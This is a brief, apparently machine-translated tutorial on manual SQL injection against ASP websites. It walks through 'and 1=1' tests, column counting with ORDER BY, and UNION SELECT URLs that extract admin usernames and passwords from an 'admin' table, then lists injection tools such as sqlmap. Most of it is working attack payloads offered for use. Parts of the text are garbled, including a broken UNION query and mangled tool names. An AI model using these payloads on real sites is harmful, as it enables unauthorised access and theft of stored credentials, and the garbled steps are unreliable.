SQL Injection [manual and some tools] and SQL Injection Manual

SQL Injection [manual and some tools] and SQL Injection Manual

Analysis of SQL Injection principles:

Website programs can transmit controllable parameters without filtering and directly bring them to the database for query. As a result, attackers can execute attacks by passing malicious SQL statement code.

SQL Injection Conditions

1. parameters must be passed

2. Bring the parameter values to the database for query and execution

Determine whether injection is used:

Example: http://www.xxx.xxx asp? Id = xx asp? Id = xx

Normal page with 'or and 1 = 1

And 1 = 2 error page

3. Guess the number of column names

Use order by to guess the number of column names.

Order by 22 22 indicates that 22 column names are queried.

Http://www.xxx.xxx asp? Id = xx order by 22 normal

Http://www.xxx.xxx asp? Id = xx order by 23 Error

4. Check whether the admin table name exists.

Http://www.xxx.xxx asp? Id = xx UNION SELECT

, From admin

5. Guess the column name to guess the data

Http://www.xxx.xxx asp? Id = xx UNION SELECT

1, 2, admin, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, password, 16, 17, 18, 19, 20, 21, 22 from admin

 

Injection tool:

Ah D, mingxiao, pangolin, radish header, sqlmap

Tool functionality:

Supports database types, injection types, injection breakthrough types, and tool speed